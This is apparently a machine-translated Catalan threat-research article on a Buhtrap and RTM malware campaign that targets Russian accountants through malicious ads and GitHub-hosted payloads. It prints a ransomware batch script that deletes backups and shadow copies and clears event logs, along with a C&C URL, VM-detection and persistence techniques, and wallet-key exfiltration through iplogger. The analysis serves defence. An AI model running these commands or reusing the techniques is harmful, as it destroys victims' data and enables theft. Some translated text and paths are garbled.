Per apuntar als comptables en un ciberatac, podeu utilitzar documents de treball que cerquen en línia. Això és aproximadament el que ha estat fent un grup cibernètic durant els últims mesos, distribuint portes posteriors conegudes. и , així com encriptadors i programari per robar criptomonedes. La majoria dels objectius es troben a Rússia. L'atac es va dur a terme mitjançant la col·locació de publicitat maliciosa a Yandex.Direct. Les víctimes potencials van ser dirigides a un lloc web on se'ls va demanar que baixessin un fitxer maliciós disfressat com a plantilla de document. Yandex va eliminar la publicitat maliciosa després del nostre advertiment.
El codi font de Buhtrap s'ha filtrat en línia en el passat perquè qualsevol pugui utilitzar-lo. No tenim informació sobre la disponibilitat del codi RTM.
En aquesta publicació us explicarem com els atacants van distribuir programari maliciós mitjançant Yandex.Direct i el van allotjar a GitHub. La publicació conclourà amb una anàlisi tècnica del programari maliciós.
Buhtrap i RTM tornen al negoci
Mecanisme de propagació i víctimes
Les diferents càrregues útils lliurades a les víctimes comparteixen un mecanisme de propagació comú. Tots els fitxers maliciosos creats pels atacants es van col·locar en dos repositoris GitHub diferents.
Normalment, el dipòsit contenia un fitxer maliciós baixable, que canviava amb freqüència. Com que GitHub us permet veure l'historial de canvis en un repositori, podem veure quin programari maliciós es va distribuir durant un període determinat. Per convèncer la víctima de descarregar el fitxer maliciós, es va utilitzar el lloc web blanki-shabloni24[.]ru, que es mostra a la figura anterior.
El disseny del lloc i tots els noms dels fitxers maliciosos segueixen un únic concepte: formularis, plantilles, contractes, mostres, etc. Tenint en compte que el programari Buhtrap i RTM ja s'ha utilitzat en atacs a comptadors en el passat, vam suposar que el L'estratègia de la nova campanya és la mateixa. L'única pregunta és com va arribar la víctima al lloc dels atacants.
Infecció
Almenys diverses víctimes potencials que van acabar en aquest lloc van ser atretes per la publicitat maliciosa. A continuació es mostra un exemple d'URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Com podeu veure a l'enllaç, el bàner es va publicar al fòrum de comptabilitat legítim bb.f2[.]kz. És important tenir en compte que els bàners van aparèixer en llocs diferents, tots tenien el mateix identificador de campanya (blanki_rsya) i la majoria relacionats amb serveis de comptabilitat o assistència legal. L'URL mostra que la víctima potencial va utilitzar la sol·licitud de "descàrrega del formulari de factura", que dóna suport a la nostra hipòtesi d'atacs dirigits. A continuació es mostren els llocs on van aparèixer els bàners i les consultes de cerca corresponents.
- descarregar el formulari de factura – bb.f2[.]kz
- contracte de mostra - Ipopen[.]ru
- mostra de queixa de l'aplicació - 77metrov[.]ru
- formulari d'acord - blank-dogovor-kupli-prodazhi[.]ru
- exemple de petició judicial - zen.yandex[.]ru
- queixa de mostra - el dia[.]ru
- exemples de formularis de contracte – Regforum[.]ru
- formulari de contracte – assistentus[.]ru
- mostra d'acord d'apartament – napravah[.]com
- mostres de contractes legals - avito[.]ru
És possible que el lloc blanki-shabloni24[.]ru s'hagi configurat per aprovar una avaluació visual senzilla. Normalment, un anunci que apunta a un lloc d'aspecte professional amb un enllaç a GitHub no sembla una cosa evidentment dolenta. A més, els atacants van penjar fitxers maliciosos al dipòsit només durant un període limitat, probablement durant la campanya. La majoria de les vegades, el dipòsit de GitHub contenia un arxiu zip buit o un fitxer EXE en blanc. Així, els atacants podrien distribuir publicitat a través de Yandex.Direct en llocs que probablement van ser visitats per comptadors que van venir en resposta a consultes de cerca específiques.
A continuació, mirem les diferents càrregues útils distribuïdes d'aquesta manera.
Anàlisi de càrrega útil
Cronologia de distribució
La campanya maliciosa va començar a finals d'octubre de 2018 i està activa en el moment d'escriure aquest article. Com que tot el repositori estava disponible públicament a GitHub, vam compilar una cronologia precisa de la distribució de sis famílies de programari maliciós diferents (vegeu la figura següent). Hem afegit una línia que mostra quan es va descobrir l'enllaç del bàner, mesurat per la telemetria ESET, per comparar-lo amb l'historial de git. Com podeu veure, això es correlaciona bé amb la disponibilitat de la càrrega útil a GitHub. La discrepància a finals de febrer es pot explicar pel fet que no teníem part de l'historial de canvis perquè el repositori es va eliminar de GitHub abans que poguéssim obtenir-lo sencer.
Figura 1. Cronologia de la distribució de programari maliciós.
Certificats de signatura de codi
La campanya va utilitzar diversos certificats. Alguns van ser signats per més d'una família de programari maliciós, la qual cosa indica a més que diferents mostres pertanyien a la mateixa campanya. Malgrat la disponibilitat de la clau privada, els operadors no van signar sistemàticament els binaris i no van utilitzar la clau per a totes les mostres. A finals de febrer de 2019, els atacants van començar a crear signatures no vàlides mitjançant un certificat propietat de Google del qual no tenien la clau privada.
Tots els certificats implicats en la campanya i les famílies de programari maliciós que signen es mostren a la taula següent.
També hem utilitzat aquests certificats de signatura de codi per establir enllaços amb altres famílies de programari maliciós. Per a la majoria de certificats, no hem trobat mostres que no es distribuïssin a través d'un dipòsit de GitHub. Tanmateix, el certificat TOV "MARIYA" es va utilitzar per signar programari maliciós pertanyent a la botnet , adware i miners. És poc probable que aquest programari maliciós estigui relacionat amb aquesta campanya. El més probable és que el certificat es va comprar a la xarxa fosca.
Win32/Filecoder.Buhtrap
El primer component que ens va cridar l'atenció va ser el recent descobert Win32/Filecoder.Buhtrap. Aquest és un fitxer binari de Delphi que de vegades s'empaqueta. Es va distribuir principalment entre febrer i març de 2019. Es comporta com correspon a un programa de ransomware: cerca unitats locals i carpetes de xarxa i xifra els fitxers detectats. No necessita una connexió a Internet perquè es vegi compromesa perquè no contacta amb el servidor per enviar claus de xifratge. En lloc d'això, afegeix un "token" al final del missatge de rescat i suggereix utilitzar el correu electrònic o Bitmessage per contactar amb els operadors.
Per xifrar tants recursos sensibles com sigui possible, Filecoder.Buhtrap executa un fil dissenyat per tancar el programari clau que pot tenir gestors de fitxers oberts que contenen informació valuosa que podria interferir amb el xifratge. Els processos objectiu són principalment sistemes de gestió de bases de dades (DBMS). A més, Filecoder.Buhtrap elimina els fitxers de registre i les còpies de seguretat per dificultar la recuperació de dades. Per fer-ho, executeu l'script per lots a continuació.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap utilitza un servei de registre d'IP en línia legítim dissenyat per recopilar informació sobre els visitants del lloc web. Això està pensat per fer un seguiment de les víctimes del ransomware, que és responsabilitat de la línia d'ordres:
mshta.exe "javascript:document.write('');"
Els fitxers per al xifratge es seleccionen si no coincideixen amb tres llistes d'exclusió. En primer lloc, els fitxers amb les extensions següents no estan xifrats: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys i .bat. En segon lloc, s'exclouen tots els fitxers per als quals la ruta completa conté cadenes de directoris de la llista següent.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
En tercer lloc, alguns noms de fitxers també estan exclosos del xifratge, entre ells el nom del fitxer del missatge de rescat. La llista es presenta a continuació. Òbviament, totes aquestes excepcions estan destinades a mantenir la màquina en funcionament, però amb una aptitud física mínima.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Esquema de xifratge de fitxers
Un cop executat, el programari maliciós genera un parell de claus RSA de 512 bits. A continuació, l'exponent privat (d) i el mòdul (n) es xifren amb una clau pública de 2048 bits codificada en dur (exponent públic i mòdul), empaquetada en zlib i codificada en base64. El codi responsable d'això es mostra a la figura 2.
Figura 2. Resultat de la descompilació Hex-Rays del procés de generació de parells de claus RSA de 512 bits.
A continuació es mostra un exemple de text sense format amb una clau privada generada, que és un testimoni adjunt al missatge de rescat.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
A continuació es mostra la clau pública dels atacants.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Els fitxers es xifren mitjançant AES-128-CBC amb una clau de 256 bits. Per a cada fitxer xifrat, es genera una nova clau i un nou vector d'inicialització. La informació clau s'afegeix al final del fitxer xifrat. Considerem el format del fitxer xifrat.
Els fitxers xifrats tenen la capçalera següent:
Les dades del fitxer font amb l'addició del valor màgic VEGA es xifren als primers 0x5000 bytes. Tota la informació de desxifrat s'adjunta a un fitxer amb l'estructura següent:
- El marcador de mida del fitxer conté una marca que indica si el fitxer té una mida superior a 0x5000 bytes
— Blob de claus AES = ZlibCompress(RSAEncrypt (clau AES + IV, clau pública del parell de claus RSA generat))
- Blob de claus RSA = ZlibCompress(RSAEncrypt (clau privada RSA generada, clau pública RSA codificada en dur))
Win32/ClipBanker
Win32/ClipBanker és un component que es va distribuir de manera intermitent des de finals d'octubre fins a principis de desembre de 2018. La seva funció és supervisar el contingut del porta-retalls, busca adreces de carteres de criptomoneda. Després d'haver determinat l'adreça de la cartera objectiu, ClipBanker la substitueix per una adreça que es creu que pertany als operadors. Les mostres que vam estudiar no estaven encaixades ni ofuscades. L'únic mecanisme utilitzat per emmascarar el comportament és el xifratge de cadenes. Les adreces de cartera de l'operador es xifren mitjançant RC4. Les criptomonedes objectiu són Bitcoin, Bitcoin Cash, Dogecoin, Ethereum i Ripple.
Durant el període en què el programari maliciós s'estava estenent a les carteres de Bitcoin dels atacants, es va enviar una petita quantitat a VTS, cosa que posa en dubte l'èxit de la campanya. A més, no hi ha proves que suggereixin que aquestes transaccions estiguessin relacionades amb ClipBanker.
Win32/RTM
El component Win32/RTM es va distribuir durant diversos dies a principis de març de 2019. RTM és un banquer troià escrit en Delphi, dirigit a sistemes bancaris remots. El 2017, els investigadors d'ESET van publicar d'aquest programa, la descripció encara és rellevant. El gener de 2019, Palo Alto Networks també es va publicar .
Carregador Buhtrap
Durant un temps, a GitHub hi havia disponible un descarregador que no era semblant a les eines anteriors de Buhtrap. Es gira cap a https://94.100.18[.]67/RSS.php?<some_id> per obtenir la següent etapa i carregar-la directament a la memòria. Podem distingir dos comportaments del codi de la segona etapa. Al primer URL, RSS.php va passar directament la porta del darrere de Buhtrap; aquesta porta del darrere és molt semblant a la disponible després de filtrar-se el codi font.
Curiosament, veiem diverses campanyes amb la porta del darrere de Buhtrap i, suposadament, estan gestionades per diferents operadors. En aquest cas, la diferència principal és que la porta posterior es carrega directament a la memòria i no utilitza l'esquema habitual amb el procés de desplegament de DLL del qual hem parlat. . A més, els operadors van canviar la clau RC4 utilitzada per xifrar el trànsit de xarxa al servidor C&C. En la majoria de campanyes que hem vist, els operadors no es van molestar en canviar aquesta clau.
El segon comportament, més complex, va ser que l'URL RSS.php es va passar a un altre carregador. Va implementar alguna ofuscació, com ara la reconstrucció de la taula d'importació dinàmica. El propòsit del carregador d'arrencada és contactar amb el servidor C&C [.]com/api/F27F84EDA4D13B15/2, envieu els registres i espereu una resposta. Processa la resposta com un blob, la carrega a la memòria i l'executa. La càrrega útil que vam veure executant aquest carregador era la mateixa porta del darrere de Buhtrap, però pot haver-hi altres components.
Android/Spy.Banker
Curiosament, també es va trobar un component per a Android al repositori de GitHub. Va estar a la branca principal només un dia: l'1 de novembre de 2018. A part de publicar-se a GitHub, la telemetria d'ESET no troba proves de la distribució d'aquest programari maliciós.
El component es va allotjar com a paquet d'aplicacions d'Android (APK). Està molt ofuscat. El comportament maliciós s'amaga en un JAR xifrat situat a l'APK. Es xifra amb RC4 mitjançant aquesta clau:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
La mateixa clau i algorisme s'utilitzen per xifrar cadenes. JAR es troba a APK_ROOT + image/files. Els primers 4 bytes del fitxer contenen la longitud del JAR xifrat, que comença immediatament després del camp de longitud.
Després d'haver desxifrat el fitxer, vam descobrir que abans era Anubis banker per a Android. El programari maliciós té les següents característiques:
- gravació del micròfon
- fent captures de pantalla
- obtenció de coordenades GPS
- keylogger
- xifratge de dades del dispositiu i demanda de rescat
- enviant correu brossa
Curiosament, el banquer va utilitzar Twitter com a canal de comunicació de seguretat per obtenir un altre servidor C&C. La mostra que hem analitzat utilitzava el compte @JonesTrader, però en el moment de l'anàlisi ja estava bloquejat.
El banquer conté una llista d'aplicacions de destinació al dispositiu Android. És més llarg que la llista obtinguda a l'estudi de Sophos. La llista inclou moltes aplicacions bancàries, programes de compres en línia com Amazon i eBay i serveis de criptomoneda.
MSIL/ClipBanker.IH
L'últim component distribuït com a part d'aquesta campanya va ser l'executable .NET Windows, que va aparèixer el març de 2019. La majoria de les versions estudiades es van empaquetar amb ConfuserEx v1.0.0. Igual que ClipBanker, aquest component utilitza el porta-retalls. El seu objectiu és una àmplia gamma de criptomonedes, així com ofertes a Steam. A més, utilitza el servei IP Logger per robar la clau WIF privada de Bitcoin.
Mecanismes de protecció
A més dels avantatges que proporciona ConfuserEx per prevenir la depuració, l'abocament i la manipulació, el component inclou la capacitat de detectar productes antivirus i màquines virtuals.
Per verificar que s'executa en una màquina virtual, el programari maliciós utilitza la línia d'ordres WMI (WMIC) integrada de Windows per sol·licitar informació de la BIOS, és a dir:
wmic bios
A continuació, el programa analitza la sortida de l'ordre i cerca paraules clau: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Per detectar productes antivirus, el programari maliciós envia una sol·licitud d'Instrumentació de gestió de Windows (WMI) al Centre de seguretat de Windows mitjançant ManagementObjectSearcher API tal com es mostra a continuació. Després de descodificar des de base64, la trucada té aquest aspecte:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figura 3. Procés d'identificació de productes antivirus.
A més, el programari maliciós comprova si , una eina per protegir-se dels atacs del porta-retalls i, si s'executa, suspèn tots els fils d'aquest procés, desactivant així la protecció.
La persistència
La versió del programari maliciós que vam estudiar es copia a si mateixa %APPDATA%googleupdater.exe i estableix l'atribut "ocult" per al directori de Google. Aleshores canvia el valor SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell al registre de Windows i afegeix el camí updater.exe. D'aquesta manera, el programari maliciós s'executarà cada vegada que l'usuari iniciï sessió.
Comportament maliciós
Igual que ClipBanker, el programari maliciós supervisa el contingut del porta-retalls i cerca adreces de cartera de criptomoneda i, quan es troba, la substitueix per una de les adreces de l'operador. A continuació es mostra una llista d'adreces de destinació en funció del que es troba al codi.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Per a cada tipus d'adreça hi ha una expressió regular corresponent. El valor STEAM_URL s'utilitza per atacar el sistema Steam, com es pot veure a l'expressió regular que s'utilitza per definir al buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Canal d'exfiltració
A més de substituir les adreces a la memòria intermèdia, el programari maliciós s'adreça a les claus WIF privades de les carteres Bitcoin, Bitcoin Core i Electrum Bitcoin. El programa utilitza plogger.org com a canal d'exfiltració per obtenir la clau privada WIF. Per fer-ho, els operadors afegeixen dades de clau privada a la capçalera HTTP User-Agent, tal com es mostra a continuació.
Figura 4. Consola IP Logger amb dades de sortida.
Els operadors no van utilitzar iplogger.org per exfiltrar carteres. Probablement van recórrer a un mètode diferent a causa del límit de 255 caràcters al camp User-Agentes mostra a la interfície web IP Logger. A les mostres que vam estudiar, l'altre servidor de sortida es va emmagatzemar a la variable d'entorn DiscordWebHook. Sorprenentment, aquesta variable d'entorn no està assignada en cap lloc del codi. Això suggereix que el programari maliciós encara està en desenvolupament i la variable s'assigna a la màquina de prova de l'operador.
Hi ha un altre senyal que el programa està en desenvolupament. El fitxer binari inclou dos URL iplogger.org i tots dos es consulten quan s'exfiltren les dades. En una sol·licitud a un d'aquests URL, el valor del camp de referència va precedit per "DEV /". També hem trobat una versió que no es va empaquetar amb ConfuserEx, el destinatari d'aquest URL s'anomena DevFeedbackUrl. Segons el nom de la variable d'entorn, creiem que els operadors tenen previst utilitzar el servei legítim Discord i el seu sistema d'intercepció web per robar carteres de criptomoneda.
Conclusió
Aquesta campanya és un exemple de l'ús de serveis publicitaris legítims en ciberatacs. L'esquema està dirigit a organitzacions russes, però no ens estranyaria veure un atac com aquest utilitzant serveis no russos. Per evitar compromisos, els usuaris han de confiar en la reputació de la font del programari que descarreguen.
Una llista completa d'indicadors de compromís i atributs MITRE ATT&CK està disponible a .
Font: www.habr.com